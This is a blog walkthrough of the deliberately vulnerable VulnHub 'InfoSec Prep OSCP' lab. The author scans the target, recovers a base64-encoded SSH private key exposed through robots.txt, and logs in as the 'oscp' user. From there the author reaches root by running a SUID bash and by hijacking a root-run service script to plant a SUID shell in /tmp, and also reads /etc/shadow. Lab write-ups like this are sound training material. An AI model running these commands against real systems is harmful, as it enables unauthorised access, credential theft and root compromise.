VulnHub InfoSec Prep OSCP Walkthrough – Stealing SSH Keys

I know that these posts are slightly repetitive, but I also solved VulnHub InfoSec Prep OSCP during my streaming!

VulnHub InfoSec Prep OSCP Walkthrough – Introduction

Just like my VulnHub Relevant walkthrough, this VulnHub box starts off attacking WordPress.

This time, it’s InfoSec Prep OSCP by FalconSpy, which you can download here.

YouTube Version of this Post

If you prefer video and audio over just reading the text, then you can find the YouTube version of this post below.

That said, don’t forget to hit those like and subscribe buttons to help support the blog and channel!

Get Your NordVPN Offer Now!


First, I ran netdiscover to get the IP of my target.

[email protected]:~# netdiscover -i eth0 -r
Currently scanning: Finished!   |   Screen View: Unique Hosts                 
8 Captured ARP Req/Rep packets, from 7 hosts.   Total size: 480               
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
-----------------------------------------------------------------------------   08:00:27:20:f3:7c      1      60  PCS Systemtechnik GmbH      

Next, I ran Nmap and saw that only ports 22 and 80 were listening on the host.

[email protected]:~/VulnHub/oscpPrep# nmap -A
Starting Nmap 7.70 ( ) at 2020-08-27 19:17 EDT
Nmap scan report for
Host is up (0.00086s latency).
Not shown: 998 closed ports
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 5.4.2
| http-robots.txt: 1 disallowed entry
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: OSCP Voucher – Just another WordPress site
MAC Address: 08:00:27:20:F3:7C (Oracle VirtualBox virtual NIC)
No exact OS matches for host (If you know what OS is running on it, see ).
TCP/IP fingerprint:

Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

1   0.86 ms

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 31.43 seconds

As I mentioned in the introduction, the target was yet another WordPress instance.

VulnHub InfoSec Prep OSCP - WordPress home page

More application info

Using standard WordPress user enumeration, I found that ‘admin’ was the only valid username.

Admin author

This WordPress instance was also vulnerable to username enumeration on the login page, as you can see from the following error.

VulnHub InfoSec Prep OSCP - WordPress user enumeration

Next, I ran CMSmap to see if there were any vulnerable plugins on the target.

[email protected]:~/tools/CMSmap# python3
[-] Date & Time: 27/08/2020 19:22:32
[-] ExploitDB and CMSmap plugins are not updated to the latest version
[-] Would you like to update it?
[y/N]: n
[I] Threads: 5
[-] Target: (
[M] Website Not in HTTPS:
[I] Server: Apache/2.4.41 (Ubuntu)
[L] X-Frame-Options: Not Enforced
[I] Strict-Transport-Security: Not Enforced
[I] X-Content-Security-Policy: Not Enforced
[I] X-Content-Type-Options: Not Enforced
[L] Robots.txt Found:
[I] CMS Detection: WordPress
[I] WordPress Version: 5.4.2
[I] WordPress Theme: twentytwenty
[-] WordPress usernames identified:
[M] admin
[M] XML-RPC services are enabled
[I] Autocomplete Off Not Found:
[-] Default WordPress Files:


[I] akismet v4.1.5
[M]  EDB-ID: 37826 "WordPress Core 3.4.2 - Multiple Path Disclosure Vulnerabilities"
[M]  EDB-ID: 37902 "WordPress Plugin Akismet - Multiple Cross-Site Scripting Vulnerabilities"
[I] worprees plugin bug dar
grep: plugin: No such file or directory
grep: bug: No such file or directory
grep: dar[&=/]: No such file or directory
[M]  EDB-ID: 48065 "WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion"
[I] Checking for Directory Listing Enabled ...


[-] Date & Time: 27/08/2020 19:24:55
[-] Completed in: 0:02:22

When I looked at robots.txt, I discovered a reference to a secret.txt file, which seemed promising.


Initial Foothold

First, I visited the secret.txt file, which seemed to be base64 encoded.


When I decoded the text, it was an OpenSSH private key.

VulnHub InfoSec Prep OSCP - Decoded secret.txt

I downloaded the secret, decoded it, and saved it to an SSH private key file.

[email protected]:~/VulnHub/oscpPrep# wget
--2020-08-27 19:33:52--
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 3502 (3.4K) [text/plain]
Saving to: ‘secret.txt’

secret.txt          100%[===================>]   3.42K  --.-KB/s    in 0s      

2020-08-27 19:33:52 (267 MB/s) - ‘secret.txt’ saved [3502/3502]

[email protected]:~/VulnHub/oscpPrep# cat secret.txt | tr -d '\n' > newsecret.txt
[email protected]:~/VulnHub/oscpPrep# cat newsecret.txt | base64 -d > newssh-key
[email protected]:~/VulnHub/oscpPrep# chmod 600 newssh-key

When I looked at the home page again, it referenced an ‘oscp’ user, so I was hoping that this was who the key was for.

OSCP user reference

Using the ‘oscp’ username and my ‘secret’ key, I connected successfully to the box!

[email protected]:~/VulnHub/oscpPrep# ssh -i newssh-key [email protected]
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-40-generic x86_64)


Last login: Sat Jul 11 16:50:11 2020 from
-bash-5.0$ id
uid=1000(oscp) gid=1000(oscp) groups=1000(oscp),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)
Get Your NordVPN Offer Now!

Privilege Escalation

First, I searched the box for any SUID binaries, as this is a common method of privilege escalation.

-bash-5.0$ find / -perm -u=s -type f 2>/dev/null

As you can see, /usr/bin/bash was actually SUID root, and I was able to IMMEDIATELY escalate my privileges! I’m not sure if this was the intended solution, but I’ll gladly take it.

-bash-5.0$ /usr/bin/bash -p
bash-5.0# id
uid=1000(oscp) gid=1000(oscp) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd),1000(oscp)

Before searching the box for additional escalation methods, I grabbed the contents of the flag file.

bash-5.0# cat flag.txt

I also grabbed the shadow file, for potential future cracking.

bash-5.0# cat /etc/shadow

There was also a file called ‘ip’ owned by root in the oscp user’s home directory.

-bash-5.0$ cat ip
cp /etc/issue-standard /etc/issue
/usr/local/bin/get-ip-address >> /etc/issue

The ‘ip-update’ service called this binary, which seemed interesting.

-bash-5.0$ grep -r "/home/oscp/ip" /etc
grep: /etc/sudoers: Permission denied
grep: /etc/ufw/before.init: Permission denied
grep: /etc/ufw/before6.rules: Permission denied
grep: /etc/ufw/before.rules: Permission denied
grep: /etc/ufw/after.init: Permission denied
grep: /etc/ufw/after6.rules: Permission denied
grep: /etc/ufw/user.rules: Permission denied
grep: /etc/ufw/after.rules: Permission denied
grep: /etc/ufw/user6.rules: Permission denied
grep: /etc/security/opasswd: Permission denied
grep: /etc/gshadow-: Permission denied
grep: /etc/shadow-: Permission denied
grep: /etc/polkit-1/localauthority: Permission denied
grep: /etc/ssl/private: Permission denied
-bash-5.0$ cat /etc/systemd/system/ip-update.service
Description=Write current ip addr to /etc/issue



As I owned my home directory, I could overwrite the existing ‘ip’ file and use the service as another avenue of privilege escalation.

-bash-5.0$ cat ip

cp /usr/bin/bash /tmp/r00t
chown root:root /tmp/r00t
chmod 4755 /tmp/r00t
-bash-5.0$ chmod +x ip
-bash-5.0$ ls -al /tmp
total 52
drwxrwxrwt 13 root root 4096 Aug 27 23:51 .
drwxr-xr-x 20 root root 4096 Jul  9 03:25 ..
drwxrwxrwt  2 root root 4096 Aug 27 19:02 .font-unix
drwxrwxrwt  2 root root 4096 Aug 27 19:02 .ICE-unix
drwx------  3 root root 4096 Aug 27 19:02 snap.lxd
drwx------  3 root root 4096 Aug 27 19:02 systemd-private-4c7993c1f7364e1c9b8b0525cab0ea5e-apache2.service-lzxICh
drwx------  3 root root 4096 Aug 27 23:02 systemd-private-4c7993c1f7364e1c9b8b0525cab0ea5e-fwupd.service-Kb1GYe
drwx------  3 root root 4096 Aug 27 19:02 systemd-private-4c7993c1f7364e1c9b8b0525cab0ea5e-systemd-logind.service-5WZZXe
drwx------  3 root root 4096 Aug 27 19:02 systemd-private-4c7993c1f7364e1c9b8b0525cab0ea5e-systemd-resolved.service-n5EyAi
drwx------  3 root root 4096 Aug 27 19:02 systemd-private-4c7993c1f7364e1c9b8b0525cab0ea5e-systemd-timesyncd.service-5RYQag
drwxrwxrwt  2 root root 4096 Aug 27 19:02 .Test-unix
drwxrwxrwt  2 root root 4096 Aug 27 19:02 .X11-unix
drwxrwxrwt  2 root root 4096 Aug 27 19:02 .XIM-unix


-bash-5.0$ ls -al /tmp
total 1204
drwxrwxrwt 12 root root    4096 Aug 28 00:03 .
drwxr-xr-x 20 root root    4096 Jul  9 03:25 ..
drwxrwxrwt  2 root root    4096 Aug 28 00:03 .font-unix
drwxrwxrwt  2 root root    4096 Aug 28 00:03 .ICE-unix
-rwsr-xr-x  1 root root 1183448 Aug 28 00:03 r00t

When I executed my new /tmp/r00t binary, I also gained the expected root permissions!

-bash-5.0$ /tmp/r00t -p
r00t-5.0# id
uid=1000(oscp) gid=1000(oscp) euid=0(root) groups=1000(oscp),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)
Get Your NordVPN Offer Now!

VulnHub InfoSec Prep OSCP Walkthrough – Conclusion

I’m still not sure if /usr/bin/bash was the expected method of privilege escalation, but the ‘ip’ script was a good edition.

This was a VERY simple box, although I’m not sure how good of a VulnHub OSCP prep box it is.

In the meantime, let me know if there is any other content that you’d like to see, or just come on over and like/subscribe to the YouTube channel!

Leave a Comment

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.